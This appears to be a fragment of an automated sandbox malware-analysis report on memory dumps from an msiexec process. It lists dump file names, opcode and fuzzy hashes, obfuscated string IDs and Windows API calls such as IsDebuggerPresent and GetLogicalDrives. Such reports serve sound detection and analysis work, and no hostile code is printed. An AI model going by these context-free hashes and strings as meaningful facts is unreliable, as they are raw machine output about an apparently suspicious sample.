                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0C1E27154C7D28AD322CF2A845036BFFE1AF93344F4849ADE0D59B392D739854ACB92
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: #$]D$,m>-$-259$-L"2$7-?i$7.UH$Ng^P$a`|f$kqcd$tdfj
                                                                                                                                                                                                                                • API String ID: 0-2351467422
                                                                                                                                                                                                                                • Opcode ID: 0730886c56a357f233a8c0ec69bde4623a69b7419b8d7dbd9f738c9a3dad4533
                                                                                                                                                                                                                                • Instruction ID: 9120f502afbdfa053223525667c5bb80322e764f52b774f271d90bc3aeda2fe4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0730886c56a357f233a8c0ec69bde4623a69b7419b8d7dbd9f738c9a3dad4533
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB6211B0514B428FC735CF29C480666FBF2BF56354B188A6DD5EA8BB92C731E806CB51
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: w4j$2-0$HX$T*0$bom$v4j
                                                                                                                                                                                                                                • API String ID: 0-968726969
Similarity
• API ID:
• String ID: 4$=g$_ZJ~$krt$vr$yhk}$}t$~{
• API String ID: 0-3292924365
Similarity
• API ID:
• String ID: %1.}$++ .$/<8*$8$!!$BAtV$GQ@G$]DCN$^^I@
• API String ID: 0-3604263128
Similarity
• API ID:
• String ID: $#$&$6$6$A$[
• API String ID: 0-1486101539
APIs
• GetLocaleInfoW.KERNEL32(00000000,2000000B,0619BBCB,00000002,00000000,?,?,?,0619BBCB,?,00000000), ref: 0619B952
• GetLocaleInfoW.KERNEL32(00000000,20001004,0619BBCB,00000002,00000000,?,?,?,0619BBCB,?,00000000), ref: 0619B97B
• GetACP.KERNEL32(?,?,0619BBCB,?,00000000), ref: 0619B990
Strings
Memory Dump Source
• Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
Similarity
• API ID:
• String ID: HDc$InA>$PWVU$Ugfe$p$x
• API String ID: 0-362884788
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: A714F7109BB40122E13A883D95AC3A84$Sdlg$[hmn$d${hcT$uw
                                                                                                                                                                                                                                • API String ID: 0-3157321161
                                                                                                                                                                                                                                • Opcode ID: 6728f6fa38d4a81e69298fda7ce56a632b818bf5ceab53a40e6a81870fab506e
                                                                                                                                                                                                                                • Instruction ID: 0d562e65a6688616ad0309fc59d405b0db0e426cebe9e7c5fc2b1cf154479d1e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6728f6fa38d4a81e69298fda7ce56a632b818bf5ceab53a40e6a81870fab506e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08C1F1B05583808FD724DF26C89176BBBE5EF92314F14896EE5D58B291D738C80ACB63
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0619BB9D
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0619BBDB
                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0619BBEE
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0619BC36
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0619BC51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 415426439-0
                                                                                                                                                                                                                                • Opcode ID: 1bf9210f47e7a048a8bb1c304c77f68ca15b5033aad5db98d59927cc93dff0cb
                                                                                                                                                                                                                                • Instruction ID: b8ca9751b5296978ec14818883ed886fd6af301b4df57af5f7d99d060dab121b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bf9210f47e7a048a8bb1c304c77f68ca15b5033aad5db98d59927cc93dff0cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15516D71E04205ABDF90DFA5EC85ABF77B8AF48701F048569E911E7194EB709A40CB70
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,06190D81,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0619B1DF
                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,06190D81,?,?,?,00000055,?,-00000050,?,?), ref: 0619B216
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0619B379
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                                • String ID: utf8
                                                                                                                                                                                                                                • API String ID: 607553120-905460609
                                                                                                                                                                                                                                • Opcode ID: bf291484189bcc384ac58410db24bb6b68bb825ea36d39b943c2c62485af19ed
                                                                                                                                                                                                                                • Instruction ID: bd35a5b1c6b67ef7d01c5da16d4284fce9e815df7de2706af2c1e384232027b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf291484189bcc384ac58410db24bb6b68bb825ea36d39b943c2c62485af19ed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6371A171A08606AAEFA4EB75AC45BAB73B8EF45700F14442AE915D7180EB70AA40C7B1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: InA>$InA>$f$wew${ew
                                                                                                                                                                                                                                • API String ID: 2994545307-1519385565
                                                                                                                                                                                                                                • Opcode ID: 221ed05757e9d0e7daf96dc81957e2fdba44cae0a55a650815139e499a4ffee5
                                                                                                                                                                                                                                • Instruction ID: b35aff28f45164880fdc236b40c35cf1c95306612dd60b6800b1b90887a71ff2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221ed05757e9d0e7daf96dc81957e2fdba44cae0a55a650815139e499a4ffee5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6222BD7060C3419FD71ACF29C890BABBBF6AF8D314F19892DE4948B291D774D885CB52
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ijk$.y-{$1I.K$WC$xz
                                                                                                                                                                                                                                • API String ID: 0-1156112397
                                                                                                                                                                                                                                • Opcode ID: 739ccdd039c597cbac7a56bf62e2ba615238823e380db533b386add3f4d37ef0
                                                                                                                                                                                                                                • Instruction ID: 35dc9a45df00e79ae1f5e611e92301e29b0588d9a49e2c9e295f1a89faf143d3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 739ccdd039c597cbac7a56bf62e2ba615238823e380db533b386add3f4d37ef0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01D125715183098BD724DF24C99226BFBE2FFD1354F288A2CE5D68B394E7749805CB92
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (P%h$*)S!$4DNt$J*:J$wr
                                                                                                                                                                                                                                • API String ID: 0-3493672791
                                                                                                                                                                                                                                • Opcode ID: 6842bbef4fe36bfca3d108e6f5cde4eb7e6fa1c1b1bd85543619f3b9e7ad33ec
                                                                                                                                                                                                                                • Instruction ID: fd26a7df42ad0768ef02acca5e4e84905da2d07840b8dc7b8e677295d2d24632
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6842bbef4fe36bfca3d108e6f5cde4eb7e6fa1c1b1bd85543619f3b9e7ad33ec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47C12171608344CFD716CF29DC5176BBBE6EB99304F558A2CF498872E2E731D90A8B12
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: &$2$5$;$[
                                                                                                                                                                                                                                • API String ID: 0-2866879556
                                                                                                                                                                                                                                • Opcode ID: 47cc63ead8d4b43c1642e8686946a7e5134fadbb1ab89ec98b0484d99b260c98
                                                                                                                                                                                                                                • Instruction ID: 290db6ff23e461ed4d46f1a4760975d78277b7f3c5b5619ccc2123c85b3bc739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47cc63ead8d4b43c1642e8686946a7e5134fadbb1ab89ec98b0484d99b260c98
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51F1157262C7808BC7249B38C4943BFFBD1ABD5364F194A3DD5EA873C2DA7489518B42
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 2$9$=:;8$gfff$t%cz
                                                                                                                                                                                                                                • API String ID: 0-4196543367
                                                                                                                                                                                                                                • Opcode ID: 51cc1df3cf2dc26d794bc7073fa2963e2d303df2cb2bc9224ca7640017990b05
                                                                                                                                                                                                                                • Instruction ID: bef0b2e451dd4ce03dbeb71aafd01c8757f2c11609b75f42899372fa0b7e6e67
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51cc1df3cf2dc26d794bc7073fa2963e2d303df2cb2bc9224ca7640017990b05
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74518C726202058FD328DF29DC617BBB6DBABC5314F68C23DD546CB2A5EBB49811CB41
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 06188BB1
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 06188C7D
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 06188C96
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 06188CA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                • Opcode ID: ce3e6a327ffeb9858071acd2b0ce27b29d5402388a7910d43eadd6b1b792c062
                                                                                                                                                                                                                                • Instruction ID: df0d5885954224a2dbffe0333bae99b1fcbe6fedd7e0739528a554ba5b87287f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce3e6a327ffeb9858071acd2b0ce27b29d5402388a7910d43eadd6b1b792c062
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05310A75D012189BDFA1EF64DD497CDBBB8BF08300F1041AAE90DAB240E7709A85CF45
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: =:;8$=== $t%cz$t%cz
                                                                                                                                                                                                                                • API String ID: 0-3208557946
                                                                                                                                                                                                                                • Opcode ID: 3f7fed079f72b57a0418bdc1d8b45f8fe986b471e5e130ebeb6a5a660c45786c
                                                                                                                                                                                                                                • Instruction ID: cdad2a3a307618a01c63492f22e6e2dd631f94879aa30c814029464f9d561041
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f7fed079f72b57a0418bdc1d8b45f8fe986b471e5e130ebeb6a5a660c45786c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC1243B15193419BE335DF24DC91BBBB3E5EF89354F04492CE5C98B291EB309A21CB92
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DrivesLogical
                                                                                                                                                                                                                                • String ID: W)$_Q
                                                                                                                                                                                                                                • API String ID: 999431828-872021665
                                                                                                                                                                                                                                • Opcode ID: 17a49515933ffb85f5d20c50a344e8b75a0c216392691b60967c67954f072a60
                                                                                                                                                                                                                                • Instruction ID: ea4a35143da6d20039df54b4de455ecc83a39117867dd331ae976cac6ca8da69
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17a49515933ffb85f5d20c50a344e8b75a0c216392691b60967c67954f072a60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D126B5910700CFDB28CF24D9922AABBB1FF46314F19996CD9869F755D738A902CF80
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: ;BG9$OO5H
                                                                                                                                                                                                                                • API String ID: 3664257935-3586822885
                                                                                                                                                                                                                                • Opcode ID: 00a51157d01cb0203fe63702af4f4ca2a713da692025affa4d0844efc32a884b
                                                                                                                                                                                                                                • Instruction ID: 572ce8ea2bbd9433c17cd6ff9a056c1d2f10b496198feec9e8fc5c089c1a8ad8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a51157d01cb0203fe63702af4f4ca2a713da692025affa4d0844efc32a884b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCA13A71A457428BE3268F38C8617B2BBD2EFA5310F298A6CD5D64B3D2D7357805C750
                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: HX$bom
                                                                                                                                                                                                                                • API String ID: 0-2027550097
                                                                                                                                                                                                                                • Opcode ID: aae5d59c45628da62b4ffcd7c527abb7c3e2f9e47ff66f1204353d94888533fe
                                                                                                                                                                                                                                • Instruction ID: 39cbfb7a6748758cb97f28c57beb187fded410fc8884487ac6d38dd3c378675b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aae5d59c45628da62b4ffcd7c527abb7c3e2f9e47ff66f1204353d94888533fe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B91EFB56093808BD320DF21E85426BBBF5FFC1744F44992CE4C59B291D7798A0ACB93
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                • Opcode ID: dc0ca21927f99ed296eea28af1a4b111ccbc57111b2445a7be7f05f7e3567a00
                                                                                                                                                                                                                                • Instruction ID: e6571dd310b6ed78139a63d481941f4ba4b8426e43f350553f51784caebfcf6f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc0ca21927f99ed296eea28af1a4b111ccbc57111b2445a7be7f05f7e3567a00
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75414BB49187408FD750EF68E98565AFBF0BF88304F11892EE998C7364D774A948CF82
                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
